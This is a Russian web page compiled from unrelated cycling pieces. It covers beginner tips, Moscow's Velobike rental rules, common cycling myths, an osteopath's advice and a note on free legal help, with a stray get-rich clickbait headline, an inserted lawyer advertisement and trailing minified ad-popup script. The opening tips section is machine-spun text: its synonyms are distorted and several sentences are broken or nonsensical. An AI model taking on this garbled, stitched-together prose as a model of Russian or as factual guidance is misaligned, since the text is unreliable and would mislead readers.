Помощь велосипедистам

10 Советов начинающим велосипедистам

Автор: best-of-moto · Опубликовано 15.05.2017 · Обновлено 25.06.2018

В данной статье я приведу 10 советов, каковые окажут помощь начинающим велосипедистам относиться к катанию на велосипеде с увлечением и большим интересом.

10 советов начинающим велосипедистам

1. Не пренебрегайте собственной безопасностью.

Купите велосипедный шлем надевайте его, даже в том случае, если планируете на маленькую велопрогулку в ближайший парк. Кроме того если вы не увлекаетесь экстремальной гонками и ездой, данный аксессуар не помешает. Запрещено зарекаться от падений, казалось бы, на ровном месте – кроме того умелые специалисты от этого не застрахованы.

И в случае если сломанная нога либо рука срастутся, только бог ведает, что будет с пробитой головой. Да и сотрясение мозга – не самая приятная вещь, которую возможно легко избежать, всего лишь израсходовав маленькую сумму.

В случае если верно подобрать размер шлема, он не начнёт сковывать перемещений либо мешать. Позаботьтесь кроме этого о безопасности собственных близких и друзей, даже если они не заядлые велосипедисты и катаются раз в год по громадным праздникам.

В некоторых европейских государствах существуют законы, запрещающие езду на велосипеде без шлема, и это верно. Голова одна и о ней стоит заботиться. Кроме этого, обучитесь верно тормозить и бережно руководите велосипедом.

2. Забудьте о правиле «мы с Тамарой ходим парой».

В случае если желаете покататься, идите и катайтесь без поиска попутчиков. Отговорка «мне не с кем» в действительности свидетельствует как раз ваше личное нежелание что-либо поменять, а не отсутствие компаньона. Вследствие этого уже не одна блестящая мысль так и оставалась как раз идеей, без попыток реализации ее в судьбу.

К тому же поиски желающего составить компанию смогут затянуться на неизвестное время, так что несложнее забрать и выгулять металлического коня самостоятельно.

Помимо этого, может оказаться так, что компаньон будет более умелым рейдером, тогда физическая нагрузка будет для вас неравномерной: кто-то всегда будет ехать в первых рядах, а кто-то плестись в хвосте. Исходя из этого первое время лучше покататься в одиночестве – привыкнуть к седлу, отыскать в памяти навыки езды и заново набраться опыта. По окончании первых 100 километров уже возможно будет поразмыслить и о компании.

3. Увеличивайте километраж неспешно.

За вами никто не гонится и не подсчитывает пройденное расстояние, не считая вас самих. Не следует замахиваться на то, что еще не по силам. В то время, когда почувствуете, что пройденные 20 километров уже не доставляют прошлого наслаждения, возможно задуматься о поездках на более долгие расстояния.

Снова же пристально выбирайте компанию для велопрогулок. Умелые и тренированные рейдеры ездят с громадными нагрузками, чем может выдержать новичок. Не насилуйте личный организм – это занятие ненужное и ненужное. Не думайте о рекордах либо амбициях. В то время, когда почувствуете, что темпа и обычного километража не хватает – увеличивайте скорость и дистанцию. Придерживайтесь комфортного как раз для вас темпа прогулки, не ориентируясь на еще кого-то.

Накатывайте выбранный километраж систематично до тех пор, пока не почувствуете, что расстояние вас уже совсем не напрягает и вы ездой.

4. Подумываете об повышении скорости езды по окончании непродолжительного времени тренировок?

Рановато. Вы еще не так круты, дабы это делать. Сперва обучитесь кататься на громадные расстояния. Лишь в то время, когда сможете проехать 40–50 километров без ощущения «я выжатый досуха лимон», возможно поразмыслить о смене тактики.

Начать на маленьких расстояниях придерживаться темпа чуть выше среднего, но не пробуя гнать на большой скорости. При дальних выкатках обучаться рассчитывать силы и неспешно додавать километраж. В случае если сможете проехать за сутки 100 километров без ощущения дикой усталости, получите новый мир.

Скоростью начнете меряться, в то время, когда станете более умелым велосипедистом.

5. Не геройствуйте!

Попав в компанию байкеров, вы в обязательном порядке непременно получите приглашение поучаствовать в каком-нибудь масштабном заезде. Трезво оцените собственные силы. То, что умелым рейдерам будет просто, может обернуться для вас многочасовой пыткой. Если они смогут за сутки проехать 200–300 километров по болотам и лесам, с форсированием и гонками бродов, с ограничением по времени и рвением успеть на последнюю электричку, вовсе не свидетельствует что это выдержите и вы.

В случае если решитесь на таковой марш-бросок, готовьсяк последствиям: ноющим мышцам, отбитому заду, недовольству и потёртостям новообретенных товарищей. Так как с громадной долей возможности вы не сможете придерживаться задаваемого ими ритма, и вместо 10-часового заезда окажется 15-часовой, и в этом обвинят «парня, что, думается, хорошо катает». Но имеется и хорошие стороны: или вы возненавидите велосипед, или станете заядлым байкером.

Не говоря уже о взлетевшей до небес самооценке.

6. Придерживайтесь тактики «на колесе».

Данный способ изначально использовался лишь в велогонках, но любители велопоходов деятельно применяют его в простых марш-бросках.

В любой велосипедной компании постоянно найдётся тот, для кого темп группы через чур медленен. Применяйте это с пользой для себя. Не забывайте, что воздушное пространство, что рассекаете своим телом, – это основной неприятель рейдера.

Езда против ветра отнимает довольно много сил, исходя из этого предоставьте эту почетную миссию тому, кто хочет расширить темп, а сами садитесь ему «на колесо». Очевидно, предварительно предотвратив, что станете ехать следом за ним. Представьте мнимую колею и придерживайтесь ее, стараясь как возможно ближе держаться к фавориту, так вы попадете в его «аэродинамический мешок» и избавите себя от необходимости бороться с ветром.

Такая маленькая хитрость окажет помощь расширить скорость группы где-то на треть. Но имеется и подводные камни: в случае если кто-то будет не хватает осмотрителен, вся несколько сможет попасть в завал. Исходя из этого нужно в один момент пристально смотреть за задним колесом фаворита и дорогой.

Сначала прием может показаться достаточно сложным, но, приноровившись, это разрешит тратить меньше сил.

7. Неизменно обращайте внимание на собственные ощущения и не отмахивайтесь от них.

Не забывайте: ваш организм – это ваш персональный радар. Время от времени и погода помой-му хорошая, и ветра нет, но желание кататься совсем отсутствует. Не мучайте себя, если не хочется.

Организм неимеетвозможности ежедневно быть наготове . Уменьшите расстояние и снизьте темп езды, не следует стремиться придерживаться изначальных нагрузок. В случае если это не оказывает помощь, лучше всецело откажитесь от выдумки.

Время от времени происходит и напротив: неожиданно накатывает желание покататься. Кроме того при погодных условиях, далеких от совершенных, ловите момент. В случае если мало свободного времени, увеличьте скорость и наслаждайтесь покатушками, в то время, когда ветер в лицо и завышенный темп лишь в эйфорию.

8. Обратите внимание на собственный велосипед.

Не обращая внимания на избитость шутки о ездоках, и средствах передвижения, это все-таки играет свою роль. В случае если кроме собственных далеко не блестящих умений, еще и ваш байк на порядок хуже, чем у товарищей, то самооценка быстро понизится. Исходя из этого присмотритесь к велосипедам компании – для каких условий они предназначены. Не постесняйтесь спросить, где они купили собственных коней, полюбопытствуйте, чему стоит уделить время при покупке прежде всего.

Это окажет помощь приобрести пускай и не навороченный, но новый и подходящий велосипед. Помните прекрасно заботиться за своим байком, в случае если желаете, дабы он прослужил вам продолжительно.

9. Позаботьтесь о верной экипировке собственного металлического приятеля.

Допустим, вы уже не воображаете собственную жизнь без катания, имеется желание совершенствоваться и расти в велоспорте. Тогда имеет суть заняться переоборудованием комплектации собственного байка под индивидуальные потребности. Обратите внимание на то, по каким дорогам вы ездите. В случае если это асфальт и приличные грунтовые дороги либо тропинки с хорошим покрытием, возможно поставить полуслики – особые шины с ровными грунтозацепами и беговыми дорожками по краям.

Замена несложных покрышек на более подходящие как раз вам существенно поменяет темп и качество езды. Силы начнут расходоваться экономнее, а громадные расстояния даваться легче.

Кроме этого возможно заменить простые педали на контактные. Раньше при езде велоспортсмены применяли особые ремешки для фиксации стопы. Но прогресс не следует на месте, была придумана альтернатива – велотуфли с шипами. Благодаря встроенному в подошву обуви шипу, нога надежно фиксируется на педали, как будто бы срастается с ней.

Никаких затруднений с фиксацией либо освобождением ног нет – велотуфли легко сливаются и кроме этого легко – поднятием пятки вверх – высвобождаются из педалей. Такая обувь незаменима, в случае если предполагается езда в горку либо против ветра, при ускорениях, и при езде в нехороших погодных условиях либо по вязкому грунту, в то время, когда не требуется беспокоиться, что нога нежданно может соскользнуть. Этого не случится, поскольку шип не разрешит ногам слететь с педалей.

Помимо этого, контактные педали разрешают верно распределить нагрузку.

Громадное значение имеет выбор седла. Байк возможно хоть суперкрутым, но, в случае если седло подобрано неправильно, любое желание кататься пропадет фактически мгновенно. Неудобство и ноющая пятая точка перевесят самовнушение, что дальше будет лучше. Может и не будет либо кроме того станет лишь хуже.

Потерстости не содействуют поднятию боевого духа и вере в красивое будущее. Исходя из этого многие новички по окончании первых неудачных выездов и полученных потертостей отказываются от велоспорта. Неспециализированная неточность, которую допускают при покупке велосипеда, – выбор широкого и мягкого седла, как на великах из детства.

Если вы собираетесь кататься на громадные расстояния необходимо сходу отказаться от таких «кроватей», какими бы эргономичными они ни казались.

10. Присмотритесь к особой одежде, которую многие компании производят как раз для велосипедистов.

Забудьте про глупое высказывание кого-то не весьма далекого, что таковой прикид подходит лишь геям. Да, снаружи он достаточно специфичен, но преимуществ у таковой велоформы довольно много. Значительно приятней катать в одежде из потопроводящего материала, быстросохнущей и аэродинамичной, чем в шортах и обычных футболках.

Помимо этого, благодаря яркой форме, велосипедист делается заметней для водителей на дороге.

ИТОГИ 2017 — какое количество МЛН Я ПОЛУЧИЛ?? КАК СТАТЬ УМЕЛЫМ ИНВЕСТОРОМ ?? КАК РАЗБОГАТЕТЬ ?

Как взять велосипед напрокат

1. Как пользоваться велопрокатом?

«Велобайк» — сеть городского общественного велопроката в Москве. Московский велопрокат работает в круглосуточном режиме обычно в период с 1 мая по 1 ноября.

Чтобы начать пользоваться велопрокатом, нужно зарегистрироваться в системе велопроката. Это можно сделать:

  • в терминале станции проката;
  • на сайте сети «Велобайк»;
  • через мобильное приложение.

При регистрации нужно будет указать имя, фамилию, адрес электронной почты и номер мобильного телефона, на который придет СМС с логином и ПИН-кодом для доступа к системе.

Чтобы получить доступ к велопрокату в первый раз, войдите в систему «Велобайк», используя полученные логин и ПИН, выберите подходящий тариф и оплатите его со своей банковской карты (Visa, Master Card или «МИР»).

2. Где и как взять велосипед?

Чтобы взять велосипед:

    выберите удобную для себя Перед тем как отправляться к велостанции, проверьте по карте, работает ли она и сколько на ней свободных велосипедов. Если станция пустая, вы не сможете взять на ней велосипед. Если станция заполнена, вы не сможете его сдать.

«>велостанцию в мобильном приложении или на сайте «Велобайк» ;

  • выберите велосипед и нажмите «ОК» на его панели;
  • введите свои логин и ПИН, или приложите привязанную к системе карту «Тройка»;
  • дождитесь звукового сигнала и заберите велосипед со стоянки.

3. Где и как взять электровелосипед?

Электровелосипеды есть на Ознакомиться с актуальным списком можно на сайте «Велобайк» .

«>некоторых станциях . Взять их могут все пользователи, зарегистрированные в системе проката. Надо выбрать тот, у которого достаточный уровень заряда батареи: если горят все три индикатора — зеленый, желтый и красный, — велосипед проедет до 18 километров, желтый и красный — до 10 километров, только красный — до 5 километров. Мигающий красный индикатор означает, что батарея разряжена.

Чтобы включить электровелосипед, нажмите красную кнопку, расположенную справа на руле. Затем плавно нажмите на курок скорости.

Электровелосипед можно вернуть на любую работающую станцию электропроката в специальный порт с надписью «Электровелосипед». В обычный порт его также можно вернуть, но только за плату — 1000 рублей.

4. Сколько стоит прокат?

Московский велопрокат предусматривает широкую линейку тарифов под разные цели и предпочтения пользователей. Подробно все цены и условия приведены на сайте «Велобайк».

5. Где кататься?

Кататься лучше по велодорожкам, потому что это наиболее удобно и безопасно при передвижении по Москве на велосипеде. Велодорожки есть в парках, природных зонах и вдоль улиц города.

Велодорожки могут быть внутрирайонными или проложенными на улицах, соединяющих соседние районы, периферию города с центром. Некоторые велодорожки подходят к транспортно-пересадочным узлам, где можно оставить свой велосипед на велосипедной парковке и пересесть на другие виды транспорта. Вблизи многих велодорожек размещаются пункты велосипедного проката.

Если вы хотите, чтобы в вашем районе появилась велопарковка, свое предложение по варианту ее размещения можно оставить на портале «Московский транспорт».

6. Как вернуть велосипед?

Взятый напрокат велосипед нужно вернуть на любую станцию проката «Велобайк» — главное, чтобы на ней были свободные стойки.

Чтобы вернуть велосипед:

  • установите велосипед в порт до упора и нажмите «ОК» на его панели;
  • дождитесь Один сигнал означает, что прокат окончен, три — ошибка.

«>звукового сигнала ;

  • дождитесь подтверждения по СМС;
  • убедитесь, что велосипед заблокирован в порту, а на его дисплее отобразилась надпись: «Возврат ок». Это подтверждение, что система приняла ваш велосипед.

Обязательно убедитесь, что система приняла ваш велосипед. В противном случае поездка не будет завершена, и спустя 48 часов с момента старта проката с банковской карты, которой был оплачен доступ, спишется штраф. Если вы брали обычный велосипед — 30 тысяч рублей, если электровелосипед — 50 тысяч рублей

7. Что еще нужно знать, прежде чем ехать?

Перед первой поездкой на велосипеде по городу:

1. Изучите правила дорожного движения для велосипедистов. Велосипедист должен соблюдать правила дорожного движения, относящиеся к транспортным средствам. Запрещено ездить на велосипеде, у которого неисправна тормозная система или рулевое управление. Перед началом движения, перестроением, поворотом (разворотом) и остановкой нужно подавать сигналы.

2. Ознакомьтесь с правилами провоза велосипедов в общественном транспорте: в метро, наземном транспорте, пригородных поездах.

3. Прочтите правила пользования велопрокатом.

  • брать велосипед в прокат лицам, не достигшим 16 лет;
  • брать велосипед в прокат в состоянии алкогольного или иного опьянения;
  • использовать велосипед за пределами МКАД;
  • перевозить на взятом в прокат велосипеде других лиц, в том числе детей, а также грузы, превышающие по своей массе 5 килограммов;
  • выезжать на взятом в прокат велосипеде на скоростные автомагистрали.

При нарушении правил проката предусмотрены штрафы:

  • возврат велосипеда с опозданием (по истечении суток с момента забора велосипеда в пункте проката) — 3000 рублей в сутки;
  • повреждение велосипеда во время аренды — до 15 000 рублей;
  • потеря или случайная гибель велосипеда — 30 000 рублей.

Важно: при невозврате велосипеда в систему в течение 48 часов и более велосипед считается украденным и с пользователя взимается стоимость велосипеда в размере 30 000 рублей.

8. Что делать, если велосипед сломался?

Позвоните в службу поддержки по телефону: +7 (495) 966-4-669 и сообщите номер велосипеда и станции, а также расскажите о неисправностях. Нужно установить велосипед в порт и дождаться однократного звукового сигнала о блокировке. Техническая служба заберет его в ремонт.

Служба поддержки работает с 07:00 до 24:00 ежедневно.

9. На чем еще покататься в Москве?

В Москве также можно взять в прокат самокат. Подробная информация об условиях проката доступна на сайте оператора «Делисамокат».

10. У меня остались вопросы. Куда обратиться?

Вопросы по работе системы велопроката «Велобайк» можно задать по телефону службы поддержки: +7 (495) 966-4-669 или отправить по электронной почте: info@velobike.ru.

Жалобы и обращения по вопросам, связанным с велосипедной инфраструктурой, можно направить в Департамент транспорта с помощью онлайн-формы.

Плохие советы велосипедисту

К большинству советов опытных велосипедистов стоит прислушаться, но некоторые из них откровенно плохи, ошибочны или просто смешны

Гонщики-любители со стажем никогда не упустят случая дать совет другому, тем более начинающему, велосипедисту. Большинство из этих советов – накопленная с опытом велосипедная мудрость, передаваемая от гонщика к гонщику или приобретённая на своей практике. Но среди всех отличных советов, которые помогут улучшить вашу езду, встречаются такие, которые чрезвычайно сомнительны.

Малые передние звёзды для слабаков

Это мнение вы можете услышать от более опытных велосипедистов, которые думают, что ломать большую передачу на каждом подъёме самый крутой и лучший образ действий. На самом деле, если вы не применяете полный спектр передач вашей трансмиссии, то попросту не используете все возможности одного из самых эффективных видов транспорта. Используемые вами звёзды (и кассета) должны позволять держать равномерную частоту вращения педалей, вам должно быть комфортно и вы не должны выматываться всякий раз только потому, что кто-то говорит, что вы выглядите круто.

Обязательно нужно брить ноги

Вопрос спорный, который обсуждается из года в год. Если задуматься, всё дело в том, что для бритья ног нет действительно важной причины, кроме той, что некоторые думают, что это позволяет выглядеть как профи. Брить ноги вовсе не обязательно (в принципе, даже женщинам) – это дело выбора и он только за вами. Просто не думайте, что это улучшит ваши спортивные результаты.

Важен не велосипед, а гонщик

Конечно, в этом есть своя правда. Однако и неправда в этом тоже есть. Велоспорт — это сочетание физических возможностей, техники и снаряжения. Даже самый тренированный человек должен прилагать массу лишних усилий, чтобы достичь значительного прогресса на плохом или неподходящем велосипеде. Например, вы могли бы победить Кристофера Фрума на подъёме в самую крутую гору, если бы он был на стальном BMX за 10 тысяч рублей, а вы на Pinarello Dogma F10. Ну, наверное, могли бы.

Нет плохой погоды, есть плохая одежда

Старая зимняя мантра. Правда, конечно, что хорошая велосипедная одежда, подобранная соответственно погоде и подходящая к дорожной ситуации может обеспечить вам тепло и сухость в холодный и мокрый день. Но если вы надели красивую куртку, это магическим образом не остановит ледяной дождь, заливающий ваше лицо, сильный порывистый ветер, практически останавливающий вас или норовящий сбросить на обочину, или ваши шины от скольжения по лужам и льду. Действительно существует такая штука, как плохая погода, независимо от того, что на вас надето.

Питание — это обман

Возможно, вы удивитесь, но некоторые велогонщики полагают, что питание во время езды является в некотором роде «жульничеством». Ну да, точно так же, как заправка автомобиля бензином, для того чтобы он ехал, в некотором роде жульничество. Следующий!

Опустите свой вынос

Это касается регулировки вашего выноса в самое низкое из возможных положение, так что ваш подбородок трётся о переднюю шину. «Это добавляет аэродинамики», — скажут они вам, ну а вы будете крючиться на своём плохо подогнанном велосипеде с болезненным спазмом в шее.

Перчатки не нужны

Ещё один миф, увековеченный гонщиками, которые думают, что езда на велосипеде должна быть суровым испытанием, чтобы чувствовать себя «настоящим» велосипедистом. Возможно, этот миф появился под влиянием некоторых профессиональных гонщиков, едущих классику с голыми пальцами — например, Том Боонен на «Париже-Рубэ». В холодную погоду перчатки держат ваши руки в тепле, ими можно утереть пот, они предотвращают мозоли и защищают руки от ссадин, если вы вдруг упали. Если перчатки – это не ваше, тоже хорошо. Только не высмеивайте их, это неразумно.

Никогда не переворачивайте велосипед, чтобы снять колесо

Перевернуть велосипед, так чтобы он опирался на седло и руль, для снятия колеса – это для «посвящённых» главный признак новичка на велосипеде. Или они так считают. Некоторые находят этот способ более удобным для снятия колёс и их обслуживания или ремонта прокола, другие не любят потертости, которые появляются при этом на седле и руле. На ваше усмотрение.

Частая каденция залог успеха

Вращение с очень высокой частотой не подходит на все случаи жизни. Если вы когда-нибудь услышите такое от того, кто уже сказал вам, что «маленькие звёзды для слабаков», то тихо и медленно отойдите от него и найдите безопасное место.

При восхождении вставайте из седла

Те, кто говорит, что вы должны вставать из седла, и те, кто говорит, что вы должны оставаться сидящим, делятся практически поровну. На самом деле, это зависит от вас — как вы себя чувствуете и вашей манеры подъёма в гору. Нет ничего плохого в использовании и того, и другого способа, чтобы поддерживать скорость и мощность.

Загрузитесь углеводами на ночь перед гонкой

Загрузка себя углеводами на основе пшеницы на ночь перед гонкой была обычной практикой, но это оказалось не самой лучшей идеей. Современные исследования показывают, что более размеренный подход к предварительному питанию, начиная за несколько дней до знакового события, более эффективен. Это обеспечит вам пребывание на пике питания во время езды, а не надежду на вчерашний тяжёлый ужин.

Спустите шины, чтобы увеличить сопротивление на тренировках

Значительное понижение давления в шинах велосипеда действительно увеличивает сопротивление качения. Да. Но это также увеличивает вероятность проколов и повреждения шин и ободьев колёс. Довольно глупая идея.

Никогда не занимайтесь сексом перед гонкой

Это мы просто оставим без комментариев.

Один велосипед на все случаи жизни

Весьма спорно, что вы можете использовать один велосипед для всего: гонки, тренировки, шоссе, пересечённая местность, тренировки на станке, езда в магазины и прочее. Просто намного лучше и удобнее иметь несколько велосипедов для определённых случаев. Признайте, что это правда.

Советы велосипедистам

В Москве открылся велосипедный сезон, и прежде чем поставить на велосипедную дорожку «железного коня» стоит прислушаться к ряду правил, которые помогут сохранить здоровье и начинающим велолюбителям, и даже спортсменам.

Советы дает ведущий врач-остеопат, травматолог-реабилитолог, врач ЛФК и спортивной медицины, специалист по кинезиотейпированию Дмитрий Горковский.

Не форсируйте нагрузку. Если после долгого перерыва начать заниматься слишком интенсивно, можно легко заработать так называемый «синдром переиспользования». Он возникает, когда спортсмен чрезмерно нагружает одну группу мышц. В результате происходит нарушение баланса мускулатуры. Как правило, первыми страдают мышцы-сгибатели бедра, они входят в состояние гипертонуса. А поскольку часть этих мышц крепится непосредственно к позвоночнику, страдает и он: боли в области поясничного отдела позвоночника у спортсменов-велосипедистов не редкость.

Проверьте растяжку! Чтобы избежать вышеупомянутого синдрома, нужно обязательно растягивать мышцы-сгибатели бедра. Вообще перед началом занятий стоит проверить себя: попробуйте из положения стоя наклониться вперед и коснуться пола кончиками пальцев. В норме вы должны без проблем доставать до пола пальцами. Если не получилось, имеет смысл обратиться к остеопату. Тот, проводя различные манипуляции с костно-мышечной и нервной системой, поможет уменьшить это расстояние от пальцев до пола. Обычно хватает 1-2 сеансов, чтобы привести себя в должную форму.

Делайте разминку. Самая важная разминка для велосипедиста – это суставная гимнастика. Комплекс такой гимнастики занимает всего 10-15 минут, а пользы от нее очень много: она поможет избежать микро травм суставов и мышц в ходе велосипедной прогулки. Особенно – учитывая специфику данного вида спорта – нужно обратить внимание на нижний квадрант, поскольку именно на ноги ложится основная нагрузка при езде на велосипеде. А значит, прежде всего разминать нужно голеностопный, коленный и тазобедренный суставы.

Упражнения просты: нужно прорабатывать суставы во всех возможных объемах движения – то есть крутить во все стороны. Получается 3D-проработка сустава. В процессе разминки не только разогреваются мышцы, окружающие сустав, но и разгоняется по всей поверхности сустава синовиальная жидкость, которая обеспечивает скольжение внутри сустава и его бесперебойную работу. Конечно, разминаясь, не забывайте и про другие части тела: руки, спину, шею, плечи и т.п.

Следите за траекторией движения колена. При езде на велосипеде нужно обязательно следить за траекторией движения коленного сустава в то время, как вы крутите педали. Колено не должно слишком сильно отклоняться внутрь и подходить близко к раме, «заваливаться» внутрь. Если подобное происходит, это говорит о том, что есть проблемы с правильным стереотипом движения. А значит, такая езда рано или поздно приведет к преждевременному изнашиванию сустава. Заметили «завал»? Надо обратиться к специалисту, который сможет разобраться досконально, в чем проблема – в самом суставе или мышцах, решит проблему ограничения подвижности и даст рекомендации по активации нужных мышц.

Не пренебрегайте кинезиотейпами. Они продлят позитивный эффект остеопатического воздействия, помогут расслабить укороченную мускулатуру и, напротив, усилить атоничную. Также кинезиотейпирование может помочь в случаях, если сам велосипедист знает о функциональной недостаточности того или иного сустава. И, конечно, это также очень эффективный и абсолютно немедикаментозный при этом способ справиться с болью и дискомфортом в случае травм (которых при езде на велосипеде, как правило, не избежать).

Не терпите боль. Самые распространенные травмы велосипедистов – это микронадрыв мышц и воспаление сухожилий. Если после велосипедной прогулки почувствовали болевые ощущения, не терпите, сходите к врачу. Чем раньше остеопат скорректирует ситуацию, тем меньше будет последствий. Ведь боль порождает порочный круг: раздраженные рецепторы заставляют мышцы мощно реагировать на болевые ощущения, это вызывает психологический дискомфорт, человек зацикливается на боли, и от того, что он постоянно об этом думает, боль становится еще сильнее. Словом, даже незначительные болевые ощущения – это повод уделить им внимание.

Не пренебрегайте защитой. Не садитесь на велосипед без шлема и защитных накладок. Шлем – не стопроцентная гарантия, но в случае падения риск заполучить черепно-мозговую травму будет гораздо ниже. Также помните, что шлем защищает череп, но не защищает шею. Поэтому одним из последствий падения может стать хлыстовая травма, даже при соблюдении всех защитных мер. Если не повезло, и произошло неприятное падение, если был удар головой или копчиком – обязательно сходите к остеопату, чтобы избежать в будущем головных болей, онемения конечностей и других последствий хлыстовой травмы.

Выбирайте велосипед сообразно задачам. Если на шоссейном велосипеде попытаться преодолеть пересеченную местность – пострадает не только велосипед, но и велосипедист. Дело в том, что у трекового велосипеда очень низкие амортизирующие свойства, и для поясницы и позвоночника такая езда окажется сильным стрессом. На пересеченной местности, ямках и ухабах и велосипед используйте соответствующий – кросс-кантри, маунтинбайк и так далее.

Соблюдайте диету. Для укрепления костной ткани, для нормальной полноценной работы всех мышц очень важно, чтобы в рационе присутствовало достаточное количество кальция. Поэтому, если вы всерьез занимаетесь спортом и ведете активный образ жизни, налегайте на кисломолочные продукты – в них очень много легкоусваиваемого кальция.

Юристы окажут велосипедистам бесплатную помощь

Все владельцы велосипедов смогут обратиться к специалистам за бесплатной юридической помощью в случае ДТП или спорных правовых вопросов.

Бывают случаи, когда только опытный адвокат по уголовным делам в москве может оказать помощь, человеку, попавшему в беду. В ситуациях, когда требуется защитить интересы бизнесы, освободить незаконно задержанного человека или получить совет профессионала по самым разным вопросам, лучше обращаться в адвокатский кабинет Якова Эмильевича Зеленского. Вы можете получить консультацию по скайпу в режиме реального времени.

Активисты проекта «Общественный велоконтроль» под руководством главы велодвижения «Русвелос» Петра Дворянкина привлекли профессиональных юристов к решению спорных велосипедных ситуаций. После внесений изменений в Правила дорожного движения число велосипедистов в столице предсказуемо растет, однако не все готовы смело колесить на своем новом транспорте в столичном дорожном потоке.

Помогать велосипедистам будут специалисты из агентства «Астрея». На регулярной основе это будут делать пять юристов, а в случае увеличения потока обращений, штат будет увеличиваться. Специалисты собираются не только отвечать на звонки, но и принимать сообщения по электронной почте, в социальных сетях и по скайпу. Также юристы проведут бесплатные семинары и консультации, посетить которые смогут как будущие велосипедисты, так и уже давние хозяева двухколесных. В случае судебных разбирательств юристы также смогут защищать интересы велосипедистов, однако эта услуга будет платной. Обратиться в центр за помощью смогут велосипедисты как из Москвы, так и из других городов страны. Вскоре соответствующие разделы о юридической помощи велосипедистам с подробной информацией о вариантах обращения к специалистам появятся в группе велодвижения «Русвелос» Вконтакте, а также на сайте агентства «Астрея» (astreya-sp.ru).

Как отмечает Петр Дворянкин, многие уже при покупке велосипеда сталкиваются с проблемами гарантий, условий ремонта двухколесного и прочими нюансами. Однако больше всего вопросов возникает при авариях с участием велосипедистов. Не секрет, что подавляющая часть автовладельцев велосипедистов даже за участников дорожного движения не считает, а потому посредственно относится к легким столкновениям с ними. Теперь водители автомобилей могут быть административно наказаны за свою халатность, а в случае тяжелого ДТП могут быть привлечены и к уголовной ответственности. Во всех сложностях движениях на дороге велосипедистам помогут разобраться профессиональные юристы.

Напомним, что нововведения в ПДД закрепляют понятия «полоса для велосипедистов», «велосипедная дорожка» и «велопешеходная дорожка», которые значительно расширяют права велосипедистов как участников дорожного движения. И автовладельцы, и обладатели велосипедов должны быть грамотны в своих действиях на дороге, а также не забывать о взаимоуважении.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e<=0&&(clearInterval(a),t.parent().replaceWith(''))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}}function flatPM_start(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length&&_.each(function(){var t=ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('
